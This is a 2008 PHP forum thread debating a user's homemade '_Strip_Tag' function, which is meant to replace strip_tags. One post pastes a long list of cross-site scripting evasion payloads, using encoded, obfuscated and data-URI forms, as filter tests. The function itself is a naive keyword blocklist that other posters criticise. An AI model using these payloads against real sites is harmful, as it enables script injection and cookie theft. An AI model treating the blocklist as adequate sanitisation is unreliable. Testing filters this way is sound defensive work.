Secure function for Strip tags! - Download

Printable View

Nov 5th, 2008, 11:18 AM
Y.P.Y

_______________

______________________
Nov 5th, 2008, 12:13 PM
the182guy

Re: Secure function for Strip tags! - Download

Another one here.
Nov 5th, 2008, 12:31 PM
Y.P.Y

Re: Secure function for Strip tags! - Download

No, is not secure! Dont use. http://uk.php.net/manual/en/function...tags.php#86463
Nov 5th, 2008, 12:47 PM
the182guy

Re: Secure function for Strip tags! - Download

Why is it not secure?

According to this the strip_tags vulnerability was fixed in CVS in 2004.
Nov 5th, 2008, 01:30 PM
kfcSmitty

Re: Secure function for Strip tags! - Download

The only vulnerability I could find is listed here:

http://www.net-security.org/vuln.php?id=3570

And it has been fixed since then. What vulnerability are you talking about, Y.P.Y?
Nov 5th, 2008, 07:07 PM
dclamp

Re: Secure function for Strip tags! - Download

Quote:

Originally Posted by Y.P.Y

No, is not secure! Dont use. http://uk.php.net/manual/en/function...tags.php#86463

This function works fine, The person who posted that note obviouly did something wrong.

it works perfectly fine for me

http://subsoft.net/personal/strip_tags.phps [Script File]
http://subsoft.net/personal/strip_tags.php

PHP Code:

<?php // a single very long <param> tag $html =<<<EOF <param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm ...[snip]... vie%20of%20All-Time"/> EOF; echo strip_tags($html, '<param>'); // this outputs an empty string ?>

outputs:

HTML Code:

<param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm ...[snip]... vie%20of%20All-Time"/>
Nov 6th, 2008, 04:44 AM
I_Love_My_Vans

Re: Secure function for Strip tags! - Download

Another attempt by Y.P.Y to take over the world with unindented PHP code.

I agree with everyone else, it would appear any vulnerabilities were fixed long ago...

...however, keep going, and keep learning.
Nov 6th, 2008, 06:13 AM
Y.P.Y

Re: Secure function for Strip tags! - Download

Check with this value:
[CODE]
<script>alert(document.cookie)</script>
<IMG SRC="javascript:alert("XSS");">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("XSS")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert( 'XSS')>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000 058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#00000 39&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert("XSS");">
<IMG SRC="jav	ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG SRC="javascript:alert("XSS");">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
"
X
S
S
"
)
"
>
<IMG SRC=" javascript:alert("XSS");">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert("XSS");">
<BODY BACKGROUND="javascript:alert("XSS")">
<BODY ONLOAD=alert("XSS")>
<IMG DYNSRC="javascript:alert("XSS")">
<IMG LOWSRC="javascript:alert("XSS")">
<BGSOUND SRC="javascript:alert("XSS");">
<BR SIZE="&{alert("XSS")}">
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert("XSS")");}</STYLE><UL><LI>XSS
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:

Code:

"> ?script?alert(?XSS?)?/script? <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("XSS");"> <IFRAME SRC="javascript:alert("XSS");"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert("XSS");"></FRAMESET> <TABLE BACKGROUND="javascript:alert("XSS")"> <TABLE><TD BACKGROUND="javascript:alert("XSS")"> <DIV STYLE="background-image: url(javascript:alert("XSS"))"> <DIV STYLE="background-image:\0075\0072\006C\0028"\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029"\0029"> <DIV STYLE="background-image: url(javascript:alert("XSS"))"> <DIV STYLE="width: expression(alert("XSS"));"> <STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))"> <XSS STYLE="xss:expression(alert("XSS"))"> exp/*<A STYLE="no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))"> <STYLE>.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE> <SCRIPT>alert("XSS");</SCRIPT> <BASE HREF="javascript:alert("XSS");//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("XSS")></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(\""; c="javascript:"; d="alert("XSS");\")"; eval(a+b+c+d); <HTML xmlns:xss> <xss:xss>XSS</xss:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert("XSS");">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B><IMG SRC="javascript:alert("XSS")"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> <? echo("<SCR)"; echo("IPT>alert("XSS")</SCRIPT>"); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert("XSS")</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4- <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0x7.147/">XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < < < < < < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C
Nov 6th, 2008, 07:43 AM
I_Love_My_Vans

Re: Secure function for Strip tags! - Download

...I think you broke the internet, you might need to amend your code tags...
Nov 6th, 2008, 09:29 AM
kfcSmitty

Re: Secure function for Strip tags! - Download

Yours trims out too much. It also doesn't have the ability to omit tags in the replace.

For example, if I was echoing something without the tags, I may want my code properly aligned in the background.

echo _Strip_Tag("<s\0\0cript>\n\ntesting");
echo strip_tags("<script>\n\ntesting<s\0cript>");

Your function will strip out the newline character, whereas the real strip_tags allows it.
Nov 6th, 2008, 02:51 PM
dclamp

Re: Secure function for Strip tags! - Download

@ YPY: The strip tags function is meant to strip tags, not to remove harmful javascript...
Nov 6th, 2008, 04:40 PM
Y.P.Y

Re: Secure function for Strip tags! - Download

Tag is all. Javascipt, HTML, VBScript...
Nov 6th, 2008, 05:30 PM
visualAd

Re: Secure function for Strip tags! - Download

Please, please invest some of your heard earned money in a "Beginning PHP 5" book.

PHP Code:

function _Strip_Tag($Str_Input) { @settype($Str_Input, 'string'); ///// no need to do this and no need to prefix it with the error supression operator $Str_Input= @strip_tags($Str_Input); //// again why are you using the error suspression operator? // where did you get these from the hexadecimal numbers are not even valid // HTML entities. The script tags would have been removed by strip tags as would the comments $_Ary_TagsList= array('jav
ascript:', 'javascript:', 'jav	ascript:', 'JaVaScRiPt:', 'JAVASCRIPT:', '<script>', '<SCRIPT>', '<script >', '<noscript>', '</script>', '<!-', '<', '>', '%3C', '&lt', '<', '&LT', '&LT;', '&#60', '&#060', '&#0060', '&#00060', '&#000060', '&#0000060', '<', '<', '<', '<', '<', '<', '&#x3c', '&#x03c', '&#x003c', '&#x0003c', '&#x00003c', '&#x000003c', '<', '<', '<', '<', '<', '&#x000003c;', '&#X3c', '&#X03c', '&#X003c', '&#X0003c', '&#X00003c', '&#X000003c', '&#X3c;', '&#X03c;', '&#X003c;', '&#X0003c;', '&#X00003c;', '&#X000003c;', '&#x3C', '&#x03C', '&#x003C', '&#x0003C', '&#x00003C', '&#x000003C', '<', '<', '<', '<', '<', '&#x000003C;', '&#X3C', '&#X03C', '&#X003C', '&#X0003C', '&#X00003C', '&#X000003C', '&#X3C;', '&#X03C;', '&#X003C;', '&#X0003C;', '&#X00003C;', '&#X000003C;', '\x3c', '\x3C', '\u003c', '\u003C', chr(60), chr(62)); $Str_Input= @str_replace($_Ary_TagsList, '', $Str_Input); // i've never seen anything so pointless in my life - what does this do // except remove two new lines? $Str_Input= @str_replace(' ', '', $Str_Input); // it was a string in the first place, why try and cast it back to a string? return((string)$Str_Input); }